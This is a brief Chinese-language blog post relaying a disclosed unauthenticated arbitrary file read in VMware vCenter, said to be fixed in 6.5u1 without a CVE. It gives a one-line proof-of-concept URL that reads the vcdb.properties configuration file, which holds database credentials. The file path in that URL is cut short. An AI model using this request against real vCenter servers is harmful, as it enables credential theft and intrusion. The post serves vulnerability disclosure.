# VMware vCenter未授权任意文件读取
### 原文链接
> https://twitter.com/ptswarm/status/1316016337550938122
在VMware vCenter中发现了一个未经身份验证的任意文件读取漏洞。VMware透露此漏洞已在6.5u1中修复,但未分配CVE
***\*POC\**:**
“`
http://x.x.x.x/eam/vib?id=c:\programData\Vmware\vCenterServer\cfg\vmware-vpx\vcdb.properti
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容